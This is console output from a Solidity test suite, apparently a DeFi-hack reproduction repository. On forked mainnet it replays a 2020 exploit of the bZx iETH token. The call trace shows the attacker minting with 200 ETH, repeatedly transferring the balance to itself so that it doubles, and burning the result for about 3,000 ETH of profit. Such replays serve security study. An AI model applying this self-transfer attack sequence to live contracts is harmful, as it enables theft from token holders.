Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2020-09/bzx_exp.sol:38:13:
   |
38 |             uint256 balance = loanToken.balanceOf(address(this));
   |             ^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
  --> src/test/2020-09/bzx_exp.sol:42:9:
   |
42 |         uint256 balance = loanToken.balanceOf(address(this));
   |         ^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2020-09/bzx_exp.sol:20:1:
   |
20 | contract bzx is BaseTestWithBalanceLog {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2020-09/bzx_exp.sol:48:5:
   |
48 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.17s (1.99ms CPU time)

Ran 1 test for src/test/2020-09/bzx_exp.sol:bzx
[PASS] testExploit() (gas: 358777)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 2999.999999999999999994

Traces:
  [7939] bzx::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 10852715 [1.085e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [453737] bzx::testExploit()
    ├─ [0] VM::deal(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ [0] VM::deal(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 200000000000000000000 [2e20])
    │   └─ ← [Return]
    ├─ [153656] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::mintWithEther{value: 200000000000000000000}(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [148434] 0xdE744d544A9d768e96C21B5F087Fc54b776E9b25::mintWithEther{value: 200000000000000000000}(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   ├─ [53623] 0xD8Ee69652E4e4838f2531732a46d1f7F584F0b7f::withdrawAccruedInterest(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   │   │   ├─ [48285] 0x103936aEC861d7CFb2d5c7F9dd1a671085f5fDd3::withdrawAccruedInterest(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   ├─ emit PayLendingFee(param0: 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, param1: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param2: 13914134821918749 [1.391e16])
    │   │   │   │   ├─ [12862] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 125227213397268735 [1.252e17])
    │   │   │   │   │   ├─ emit Transfer(from: 0xD8Ee69652E4e4838f2531732a46d1f7F584F0b7f, to: 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, value: 125227213397268735 [1.252e17])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x4221ce27c0ff024fe62c07f21e28fbc5534696689a4dd5f17b9fffb25b8a0a18: 0x0000000000000000000000000000000000000000000000aa162bdf6e6d44dcfd → 0x0000000000000000000000000000000000000000000000aa17e8c4eb200675fc
    │   │   │   │   │   │   @ 0x9f6ca9ea3f6b6494438593b5f99e5693d2f66f46e86a529a76fc74fc0e1b77d4: 0x0000000000000000000000000000000000000000000000a852ccc181d053620f → 0x0000000000000000000000000000000000000000000000a8510fdc051d91c910
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit VaultWithdraw(param0: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, param1: 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, param2: 125227213397268735 [1.252e17])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xcffcad63fc06d83f82f5a7d1d46ad20250114eeceb04dbdc11c4184338171465: 0x0000000000000000000000000000000000000000000000000ba477d22f55d75d → 0x0000000000000000000000000000000000000000000000000bd5e6a726c0af7a
    │   │   │   │   │   @ 0x4f3df49bc3aadecd7dcd92b6823c95d1dc709e1a38e854e9246e7262c17f794c: 0x000000000000000000000000000000000000000000000000000000005f5dda55 → 0x000000000000000000000000000000000000000000000000000000005f5de158
    │   │   │   │   │   @ 0x4f3df49bc3aadecd7dcd92b6823c95d1dc709e1a38e854e9246e7262c17f794a: 0x00000000000000000000000000000000000000000000001fb5e3558f4e7a6960 → 0x00000000000000000000000000000000000000000000001fb3f5013da44df844
    │   │   │   │   │   @ 0x4f3df49bc3aadecd7dcd92b6823c95d1dc709e1a38e854e9246e7262c17f794b: 0x000000000000000000000000000000000000000000000000f5ee4e8ba2d9132d → 0x000000000000000000000000000000000000000000000000f7dca2dd4d058449
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [8483] 0xD8Ee69652E4e4838f2531732a46d1f7F584F0b7f::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   ├─ [3134] 0x4Cb1292d6a860ca1B0991FC7DfA30a656ef7e7C7::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6) [staticcall]
    │   │   │   └─ ← [Return] 3137669335902226642428 [3.137e21]
    │   │   ├─ [2074] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 200000000000000000000}()
    │   │   │   ├─ emit Deposit(dst: 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, wad: 200000000000000000000 [2e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x4221ce27c0ff024fe62c07f21e28fbc5534696689a4dd5f17b9fffb25b8a0a18: 0x0000000000000000000000000000000000000000000000aa17e8c4eb200675fc → 0x0000000000000000000000000000000000000000000000b4ef778145e62675fc
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Mint(param0: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 199175744986951054102 [1.991e20], param2: 200000000000000000000 [2e20], param3: 1004138330262567597 [1.004e18])
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199175744986951054102 [1.991e20])
    │   │   ├─  storage changes:
    │   │   │   @ 19: 0x0000000000000000000000000000000000000000000001810d1d8bfa7a624b61 → 0x00000000000000000000000000000000000000000000018bd93bf0c407643e77
    │   │   │   @ 0x4221ce27c0ff024fe62c07f21e28fbc5534696689a4dd5f17b9fffb25b8a0a18: 0x0000000000000000000000000000000000000000000000aa162bdf6e6d44dcfd → 0x0000000000000000000000000000000000000000000000aa17e8c4eb200675fc
    │   │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0 → 0x00000000000000000000000000000000000000000000000acc1e64c98d01f316
    │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x0000000000000000000000000000000000000000000000000def6a7dc0a77aad
    │   │   │   @ 4: 0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000005f5dda5512 → 0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000005f5de15812
    │   │   └─ ← [Return] 199175744986951054102 [1.991e20]
    │   └─ ← [Return] 199175744986951054102 [1.991e20]
    ├─ [531] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::balanceOf(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 199175744986951054102 [1.991e20]
    ├─ [52498] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::transfer(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199175744986951054102 [1.991e20])
    │   ├─ [51749] 0xdE744d544A9d768e96C21B5F087Fc54b776E9b25::transfer(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199175744986951054102 [1.991e20]) [delegatecall]
    │   │   ├─ [1983] 0xD8Ee69652E4e4838f2531732a46d1f7F584F0b7f::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   ├─ [1134] 0x4Cb1292d6a860ca1B0991FC7DfA30a656ef7e7C7::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6) [staticcall]
    │   │   │   └─ ← [Return] 3337669335902226642428 [3.337e21]
    │   │   ├─ emit Transfer(from: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199175744986951054102 [1.991e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0x00000000000000000000000000000000000000000000000acc1e64c98d01f316 → 0x000000000000000000000000000000000000000000000015983cc9931a03e62c
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [531] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::balanceOf(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 398351489973902108204 [3.983e20]
    ├─ [52498] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::transfer(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 398351489973902108204 [3.983e20])
    │   ├─ [51749] 0xdE744d544A9d768e96C21B5F087Fc54b776E9b25::transfer(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 398351489973902108204 [3.983e20]) [delegatecall]
    │   │   ├─ [1983] 0xD8Ee69652E4e4838f2531732a46d1f7F584F0b7f::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   ├─ [1134] 0x4Cb1292d6a860ca1B0991FC7DfA30a656ef7e7C7::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6) [staticcall]
    │   │   │   └─ ← [Return] 3337669335902226642428 [3.337e21]
    │   │   ├─ emit Transfer(from: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 398351489973902108204 [3.983e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0x000000000000000000000000000000000000000000000015983cc9931a03e62c → 0x00000000000000000000000000000000000000000000002b307993263407cc58
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [531] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::balanceOf(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 796702979947804216408 [7.967e20]
    ├─ [52498] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::transfer(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 796702979947804216408 [7.967e20])
    │   ├─ [51749] 0xdE744d544A9d768e96C21B5F087Fc54b776E9b25::transfer(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 796702979947804216408 [7.967e20]) [delegatecall]
    │   │   ├─ [1983] 0xD8Ee69652E4e4838f2531732a46d1f7F584F0b7f::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   ├─ [1134] 0x4Cb1292d6a860ca1B0991FC7DfA30a656ef7e7C7::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6) [staticcall]
    │   │   │   └─ ← [Return] 3337669335902226642428 [3.337e21]
    │   │   ├─ emit Transfer(from: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 796702979947804216408 [7.967e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0x00000000000000000000000000000000000000000000002b307993263407cc58 → 0x00000000000000000000000000000000000000000000005660f3264c680f98b0
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [531] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::balanceOf(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1593405959895608432816 [1.593e21]
    ├─ [52498] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::transfer(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1593405959895608432816 [1.593e21])
    │   ├─ [51749] 0xdE744d544A9d768e96C21B5F087Fc54b776E9b25::transfer(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1593405959895608432816 [1.593e21]) [delegatecall]
    │   │   ├─ [1983] 0xD8Ee69652E4e4838f2531732a46d1f7F584F0b7f::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   ├─ [1134] 0x4Cb1292d6a860ca1B0991FC7DfA30a656ef7e7C7::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6) [staticcall]
    │   │   │   └─ ← [Return] 3337669335902226642428 [3.337e21]
    │   │   ├─ emit Transfer(from: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1593405959895608432816 [1.593e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0x00000000000000000000000000000000000000000000005660f3264c680f98b0 → 0x0000000000000000000000000000000000000000000000acc1e64c98d01f3160
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [531] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::balanceOf(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 3186811919791216865632 [3.186e21]
    ├─ [35883] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::burnToEther(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3186811919791216865632 [3.186e21])
    │   ├─ [35155] 0xdE744d544A9d768e96C21B5F087Fc54b776E9b25::burnToEther(bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3186811919791216865632 [3.186e21]) [delegatecall]
    │   │   ├─ [1983] 0xD8Ee69652E4e4838f2531732a46d1f7F584F0b7f::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   ├─ [1134] 0x4Cb1292d6a860ca1B0991FC7DfA30a656ef7e7C7::getTotalPrincipal(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [delegatecall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000d88d225f745be6e5cc
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6) [staticcall]
    │   │   │   └─ ← [Return] 3337669335902226642428 [3.337e21]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB983E01458529665007fF7E0CDdeCDB74B967Eb6) [staticcall]
    │   │   │   └─ ← [Return] 3337669335902226642428 [3.337e21]
    │   │   ├─ emit Burn(param0: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 3186811919791216865632 [3.186e21], param2: 3199999999999999999994 [3.199e21], param3: 1004138330262567597 [1.004e18])
    │   │   ├─ emit Transfer(from: bzx: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 3186811919791216865632 [3.186e21])
    │   │   ├─ [9213] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(3199999999999999999994 [3.199e21])
    │   │   │   ├─ [73] 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6::fallback{value: 3199999999999999999994}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: 0xB983E01458529665007fF7E0CDdeCDB74B967Eb6, wad: 3199999999999999999994 [3.199e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x4221ce27c0ff024fe62c07f21e28fbc5534696689a4dd5f17b9fffb25b8a0a18: 0x0000000000000000000000000000000000000000000000b4ef778145e62675fc → 0x000000000000000000000000000000000000000000000007768bbb9984267602
    │   │   │   └─ ← [Stop]
    │   │   ├─ [41] bzx::fallback{value: 3199999999999999999994}()
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 0x16102f891729262ce67210a124a159646f7714794acb4ed5a594ecb524124440: 0x0000000000000000000000000000000000000000000000acc1e64c98d01f3160 → 0
    │   │   │   @ 19: 0x00000000000000000000000000000000000000000000018bd93bf0c407643e77 → 0x0000000000000000000000000000000000000000000000df1755a42b37450d17
    │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0x0000000000000000000000000000000000000000000000000def6a7dc0a77aad → 0
    │   │   └─ ← [Return] 3199999999999999999994 [3.199e21]
    │   └─ ← [Return] 3199999999999999999994 [3.199e21]
    ├─ [0] 0x0000000000000000000000000000000000000000::fallback{value: 200000000000000000000}()
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 2999999999999999999994 [2.999e21], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.21s (10.09s CPU time)

Ran 2 test suites in 11.27s (12.37s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
